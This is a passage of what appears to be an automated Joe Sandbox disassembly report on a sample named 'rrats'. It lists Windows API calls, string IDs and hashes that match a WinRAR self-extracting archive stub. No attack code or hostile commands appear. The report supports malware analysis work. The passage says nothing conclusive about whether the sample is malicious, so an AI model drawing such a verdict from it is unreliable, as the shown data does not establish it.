                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                              • MoveFileW.KERNEL32(?,?), ref: 00CA94D4
                                                              • MoveFileW.KERNEL32(?,?), ref: 00CA9514
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                              • String ID: rtmp%d
                                                              • API String ID: 3726343395-3303766350
                                                              • Opcode ID: 37616650fdb388537e720dc665ea6ed7e90988f25cda8bae5bd1bef8b1ba3980
                                                              • Instruction ID: d8593ec027ba409c95f1c52e12ec5d9180e2ba150b24593d0823f86fa1f9e90f
                                                              • Instruction Fuzzy Hash: 614198B1D0025A66CF21EBA0CC46EDF737CEF46344F0049A5B619E3051EB389B89EB60
                                                              APIs
                                                              • __aulldiv.LIBCMT ref: 00CB122E
                                                                • Part of subcall function 00CAB146: GetVersionExW.KERNEL32(?), ref: 00CAB16B
                                                              • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00CB1251
                                                              • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00CB1263
                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00CB1274
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB1284
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB1294
                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00CB12CF
                                                              • __aullrem.LIBCMT ref: 00CB1379
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                              • String ID:
                                                              • API String ID: 1247370737-0
                                                              • Opcode ID: 33de36c04a18531532a80de507fc1e3fee979134e951d5b0325b930577b594da
                                                              • Instruction ID: 48e5770b271d2b31f2a99f3c35ef2168832c1081158ba443130f047f96677e48
                                                              • Instruction Fuzzy Hash: E241FBB15083459FC710DF65C884AAFBBE9FB88314F44892EF996C2250E738E649DB52
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 00CA2536
                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                                • Part of subcall function 00CB05DA: _wcslen.LIBCMT ref: 00CB05E0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: __vswprintf_c_l_swprintf_wcslen
                                                              • String ID: ;%u$x%u$xc%u
                                                              • API String ID: 3053425827-2277559157
                                                              • Opcode ID: 8bb44c30e518fa1df7c7683f1d96eb2dc2ccaedfede91be80b448c9fb5ca1c24
                                                              • Instruction ID: a82f7c690878b7ea72cc495ec56ad8b9812c442f3f8ba043d28e4e7bba2a7351
                                                              • Instruction Fuzzy Hash: 00F168716043529BCB24DF2C84D5BFE77996F9230CF08456DFC869B283CB648A49D7A2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: </p>$</style>$<br>$<style>$>
                                                              • API String ID: 176396367-3568243669
                                                              • Opcode ID: 6cc8543d3b7edaf92461e54abc5594595420a9e52a0d7faf9e14c4be95a393eb
                                                              • Instruction ID: 8ddb59badfdf87eaf157c227d1c6b33b07ee37b8d68a7ca5b5216e3e9cf78f92
                                                              • Opcode Fuzzy Hash: 6cc8543d3b7edaf92461e54abc5594595420a9e52a0d7faf9e14c4be95a393eb
                                                              • Instruction Fuzzy Hash: C851E56674036395DB309A769822BF673E0DFA1750F69442AFFD18B2C0FB75CE818261
                                                              APIs
                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00CCFE02,00000000,00000000,00000000,00000000,00000000,00CC529F), ref: 00CCF6CF
                                                              • __fassign.LIBCMT ref: 00CCF74A
                                                              • __fassign.LIBCMT ref: 00CCF765
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00CCF78B
                                                              • WriteFile.KERNEL32(?,00000000,00000000,00CCFE02,00000000,?,?,?,?,?,?,?,?,?,00CCFE02,00000000), ref: 00CCF7AA
                                                              • WriteFile.KERNEL32(?,00000000,00000001,00CCFE02,00000000,?,?,?,?,?,?,?,?,?,00CCFE02,00000000), ref: 00CCF7E3
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID:
                                                              • API String ID: 1324828854-0
                                                              • Opcode ID: b39e2655062f000bd1c2a561f2cef8eda3a88453daad817482f2bb7c0d985a6f
                                                              • Instruction ID: 76a4c0ba8af459320be2e094976cda4bbcd3385f8fd01ee0d9d00af5c6e2c0e2
                                                              • Opcode Fuzzy Hash: b39e2655062f000bd1c2a561f2cef8eda3a88453daad817482f2bb7c0d985a6f
                                                              • Instruction Fuzzy Hash: 805141B19002499FDB10CFA8DC85FEEBBF5EF09310F14416EE555E7291D670AA42CBA1
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 00CC2937
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00CC293F
                                                              • _ValidateLocalCookies.LIBCMT ref: 00CC29C8
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00CC29F3
                                                              • _ValidateLocalCookies.LIBCMT ref: 00CC2A48
                                                              Strings
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              • Opcode ID: e9a978eed9c0ac18b70e9b8458f163e6ed8fe88e37aae04469b8d0621368b7b6
                                                              • Instruction ID: bb4c7b7e56d3235fab02c3f049201f1280f5cdc4f018ca9f2fdd4678b66c38be
                                                              • Opcode Fuzzy Hash: e9a978eed9c0ac18b70e9b8458f163e6ed8fe88e37aae04469b8d0621368b7b6
                                                              • Instruction Fuzzy Hash: AE41D534E00248AFCF10EF69C885F9EBBB5EF44324F14805AE819AB392D771DA51DB91
                                                              APIs
                                                              • ShowWindow.USER32(?,00000000), ref: 00CB9EEE
                                                              • GetWindowRect.USER32(?,00000000), ref: 00CB9F44
                                                              • ShowWindow.USER32(?,00000005,00000000), ref: 00CB9FDB
                                                              • SetWindowTextW.USER32(?,00000000), ref: 00CB9FE3
                                                              • ShowWindow.USER32(00000000,00000005), ref: 00CB9FF9
                                                              Strings
                                                              Similarity
                                                              • API ID: Window$Show$RectText
                                                              • String ID: RarHtmlClassName
                                                              • API String ID: 3937224194-1658105358
                                                              • Opcode ID: 5fbe6f84da5016fae0f0ad06b3d8a8e180cabfa1f431c25e050a6e091cf27c39
                                                              • Instruction ID: 13de0d52a234b3e9722d96dec1b1db3ed4de1cb01346f36e9779646f7f2a56a0
                                                              • Opcode Fuzzy Hash: 5fbe6f84da5016fae0f0ad06b3d8a8e180cabfa1f431c25e050a6e091cf27c39
                                                              • Instruction Fuzzy Hash: 0F41A031008314EFCB216FA5EC48BAB7BACEF48711F008559F95A9A156DB34DA54CBA2
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                              • API String ID: 176396367-3743748572
                                                              • Opcode ID: 01c328b9091117bc375fe59e1bc6941e461c03f0a644141c03929129dc4d890c
                                                              • Instruction ID: aeb9cff46b9f3cbfba9834b029291d1b94580589d7ee34d1338d83c6222083b2
                                                              • Opcode Fuzzy Hash: 01c328b9091117bc375fe59e1bc6941e461c03f0a644141c03929129dc4d890c
                                                              • Instruction Fuzzy Hash: 8A31403264434556DA34AB54AC42BFB73A4EB50720F50842FFAA6972C0FB70EF4193A5
                                                              APIs
                                                                • Part of subcall function 00CCC868: _free.LIBCMT ref: 00CCC891
                                                              • _free.LIBCMT ref: 00CCC8F2
                                                                • Part of subcall function 00CC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?), ref: 00CC8DE2
                                                                • Part of subcall function 00CC8DCC: GetLastError.KERNEL32(?,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?,?), ref: 00CC8DF4
                                                              • _free.LIBCMT ref: 00CCC8FD
                                                              • _free.LIBCMT ref: 00CCC908
                                                              • _free.LIBCMT ref: 00CCC95C
                                                              • _free.LIBCMT ref: 00CCC967
                                                              • _free.LIBCMT ref: 00CCC972
                                                              • _free.LIBCMT ref: 00CCC97D
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                              • Instruction ID: 8508b89f69b22fdd97d766211fc38b5f9eb3e7f9c7b61647e3a2991f987d99f6
                                                              • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                              • Instruction Fuzzy Hash: 20110D71980B05AAE520B7B1DC87FCB7BBC9F04B00F804C1DF29E660D2DA65E509A750
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00CBE669,00CBE5CC,00CBE86D), ref: 00CBE605
                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00CBE61B
                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00CBE630
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                              • API String ID: 667068680-1718035505
                                                              • Opcode ID: 0421938d4c7277efade8b5b8b26ca7339f29aad1d82403f1907fd04c228025e2
                                                              • Instruction ID: ce3ab5f329f79f99fd185c4e38cdc4581cc7bcbe8256b5c84833195bdee5a488
                                                              • Opcode Fuzzy Hash: 0421938d4c7277efade8b5b8b26ca7339f29aad1d82403f1907fd04c228025e2
                                                              • Instruction Fuzzy Hash: 74F0F635B8176A9F9F224F665C847EAB3C86E25F41B04043AFD15D3340FB10CE50ABA5
                                                              APIs
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB14C2
                                                                • Part of subcall function 00CAB146: GetVersionExW.KERNEL32(?), ref: 00CAB16B
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CB14E6
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CB1500
                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00CB1513
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB1523
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB1533
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                              • String ID:
                                                              • API String ID: 2092733347-0
                                                              • Opcode ID: 23132968e417fe9b39d11df200bc3493d4a4737a8e35205c5e93ecc36037a543
                                                              • Instruction ID: 967bfbffa5bbfcdbd7a5123f3705f1f41709e0e06e8edac2e1a57c0fa998103d
                                                              • Opcode Fuzzy Hash: 23132968e417fe9b39d11df200bc3493d4a4737a8e35205c5e93ecc36037a543
                                                              • Instruction Fuzzy Hash: 6931E875108346ABC704DFA8C884A9FB7F8BF98714F444A1EF999C3210E734D649CBA6
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,00CC2AF1,00CC02FC,00CBFA34), ref: 00CC2B08
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CC2B16
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CC2B2F
                                                              • SetLastError.KERNEL32(00000000,00CC2AF1,00CC02FC,00CBFA34), ref: 00CC2B81
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: e14b66b75c6ccbda90dd90529c2ed88d31f861e821b463cad64bbba197bd5d6e
                                                              • Instruction ID: 85018138de8df2f37b817aeca30a7f3bd3f3e3f2886447bb7474e985f1c3f899
                                                              • Opcode Fuzzy Hash: e14b66b75c6ccbda90dd90529c2ed88d31f861e821b463cad64bbba197bd5d6e
                                                              • Instruction Fuzzy Hash: 8F01F23221A722AFE6642B75FC95F2F2B99EF41B74B60473FF122590E0EF115E01A244
                                                              APIs
                                                              • GetLastError.KERNEL32(?,00CE1098,00CC4674,00CE1098,?,?,00CC40EF,?,?,00CE1098), ref: 00CC97E9
                                                              • _free.LIBCMT ref: 00CC981C
                                                              • _free.LIBCMT ref: 00CC9844
                                                              • SetLastError.KERNEL32(00000000,?,00CE1098), ref: 00CC9851
                                                              • SetLastError.KERNEL32(00000000,?,00CE1098), ref: 00CC985D
                                                              • _abort.LIBCMT ref: 00CC9863
                                                              Similarity
                                                              • API ID: ErrorLast$_free$_abort
                                                              • String ID:
                                                              • API String ID: 3160817290-0
                                                              • Opcode ID: 3e50cb498cc611eca23747828d66c7b2230e4fcc60a630e6bcd33f03257d9da0
                                                              • Instruction ID: f17bf1e2931b28f6c61db2aa5de233d0ab31d72a52a63d88c37acc99c74bff15
                                                              • Opcode Fuzzy Hash: 3e50cb498cc611eca23747828d66c7b2230e4fcc60a630e6bcd33f03257d9da0
                                                              • Instruction Fuzzy Hash: D9F0223610160266C6523338FC0EF2F2B69CFD2B35F25003DF629A31D2EE308D06A266
                                                              APIs
                                                                • Part of subcall function 00CB05DA: _wcslen.LIBCMT ref: 00CB05E0
                                                                • Part of subcall function 00CAB92D: _wcsrchr.LIBVCRUNTIME ref: 00CAB944
                                                              • _wcslen.LIBCMT ref: 00CAC197
                                                              • _wcslen.LIBCMT ref: 00CAC1DF
                                                              Strings
                                                              Similarity
                                                              • API ID: _wcslen$_wcsrchr
                                                              • String ID: .exe$.rar$.sfx
                                                              • API String ID: 3513545583-31770016
                                                              • Opcode ID: 64c95a0e6545d86d5038e58d9c1b35e6c030c3e5f2dc538d131159942aa9ad33
                                                              • Instruction ID: c78be7e957c980d7f60fa4192f756ac28eecd9f5481f8abb979c1ee42dc4ec73
                                                              • Opcode Fuzzy Hash: 64c95a0e6545d86d5038e58d9c1b35e6c030c3e5f2dc538d131159942aa9ad33
                                                              • Instruction Fuzzy Hash: 5A414A2260035395C732AF748892A7F73B8EF4375CF24490EFAA1AB182EB504F81D391
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00CABB27
                                                              • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00CAA275,?,?,00000800,?,00CAA23A,?,00CA755C), ref: 00CABBC5
                                                              • _wcslen.LIBCMT ref: 00CABC3B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CurrentDirectory
                                                              • String ID: UNC$\\?\
                                                              • API String ID: 3341907918-253988292
                                                              • Opcode ID: 7ec7832b75334196feb0079892a18c084da0b25be027c833d2fa1eff0b257954
                                                              • Instruction ID: 6d6100f07a981ebdecf799dcbaee4b6168134376483872e3b58a1aff68e6fb58
                                                              • Opcode Fuzzy Hash: 7ec7832b75334196feb0079892a18c084da0b25be027c833d2fa1eff0b257954
                                                              • Instruction Fuzzy Hash: 0241B271400257A6CF21AFA0DC45EEF77ADAF423ACF108566F924A3152EB70DE90DB60
                                                              APIs
                                                              • LoadBitmapW.USER32(00000065), ref: 00CBB6ED
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00CBB712
                                                              • DeleteObject.GDI32(00000000), ref: 00CBB744
                                                              • DeleteObject.GDI32(00000000), ref: 00CBB767
                                                                • Part of subcall function 00CBA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CBB73D,00000066), ref: 00CBA6D5
                                                                • Part of subcall function 00CBA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00CBB73D,00000066), ref: 00CBA6EC
                                                                • Part of subcall function 00CBA6C2: LoadResource.KERNEL32(00000000,?,?,?,00CBB73D,00000066), ref: 00CBA703
                                                                • Part of subcall function 00CBA6C2: LockResource.KERNEL32(00000000,?,?,?,00CBB73D,00000066), ref: 00CBA712
                                                                • Part of subcall function 00CBA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CBB73D,00000066), ref: 00CBA72D
                                                                • Part of subcall function 00CBA6C2: GlobalLock.KERNEL32(00000000), ref: 00CBA73E
                                                                • Part of subcall function 00CBA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00CBA762
                                                                • Part of subcall function 00CBA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CBA7A7
                                                                • Part of subcall function 00CBA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00CBA7C6
                                                                • Part of subcall function 00CBA6C2: GlobalFree.KERNEL32(00000000), ref: 00CBA7CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                              • String ID: ]
                                                              • API String ID: 1797374341-3352871620
                                                              • Opcode ID: 2b494df56d3920df9ea3c3f1015dda3aea372981504f0ae59846948cfd8bfe17
                                                              • Instruction ID: 5b4e8d45838a0c7ec352cec0c72baf0b21128e0c484c18b9dee482ec54b93652
                                                              • Opcode Fuzzy Hash: 2b494df56d3920df9ea3c3f1015dda3aea372981504f0ae59846948cfd8bfe17
                                                              • Instruction Fuzzy Hash: 7401C03654060167C7227B799C49BEF7ABE9FC0B52F080011F954B7291EFB18E0992B1
                                                              APIs
                                                                • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                • Part of subcall function 00CA1316: SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                              • EndDialog.USER32(?,00000001), ref: 00CBD64B
                                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00CBD661
                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CBD675
                                                              • SetDlgItemTextW.USER32(?,00000068), ref: 00CBD684
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: RENAMEDLG
                                                              • API String ID: 445417207-3299779563
                                                              • Opcode ID: 475e166afa11cd7d0fc3d8a3bd0142fc13e3af8364cc5b21d7bae888416d9d91
                                                              • Instruction ID: 4aa975e44746168b96666356d736db2530eec7aeb260e432002e814da747f6b1
                                                              • Opcode Fuzzy Hash: 475e166afa11cd7d0fc3d8a3bd0142fc13e3af8364cc5b21d7bae888416d9d91
                                                              • Instruction Fuzzy Hash: F8012833345314BAD2204F659D09FAB776CEB5AB02F010815F30AE21D0D6A29A05CB7A
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00CC7E24,?,?,00CC7DC4,?,00CDC300,0000000C,00CC7F1B,?,00000002), ref: 00CC7E93
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CC7EA6
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00CC7E24,?,?,00CC7DC4,?,00CDC300,0000000C,00CC7F1B,?,00000002,00000000), ref: 00CC7EC9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 1abb006dd0b90c6dafa6c5b975f0c25d1f392bbf8cbd535e2e5c41e0e5876e49
                                                              • Instruction ID: 28c4c29bdd070b225f58ec9bb95bf3b17e533bf6c5a75b0a75da8c4e012b81f2
                                                              • Opcode Fuzzy Hash: 1abb006dd0b90c6dafa6c5b975f0c25d1f392bbf8cbd535e2e5c41e0e5876e49
                                                              • Instruction Fuzzy Hash: D5F06232A01218BFCB11AFA0DC09F9EBFB4EF44715F0181AEF805A2261DB309F40CA91
                                                              APIs
                                                                • Part of subcall function 00CB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CB0836
                                                                • Part of subcall function 00CB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAF2D8,Crypt32.dll,00000000,00CAF35C,?,?,00CAF33E,?,?,?), ref: 00CB0858
                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CAF2E4
                                                              • GetProcAddress.KERNEL32(00CE81C8,CryptUnprotectMemory), ref: 00CAF2F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                              • API String ID: 2141747552-1753850145
                                                              • Opcode ID: 31615e601d845bf366671cd0f1c322884fa74fc3beb4601ca3c7ac3b0770d98b
                                                              • Instruction ID: 9c2f9bae2332ffe9c56ff24ddc06d72be09da4a63fa0e76a648bca5be565db00
                                                              • Opcode Fuzzy Hash: 31615e601d845bf366671cd0f1c322884fa74fc3beb4601ca3c7ac3b0770d98b
                                                              • Instruction Fuzzy Hash: 06E0DF74A017829ECB209BB4984CB027BD46F04704F14C82EE1DA93250C7B0E2408B21
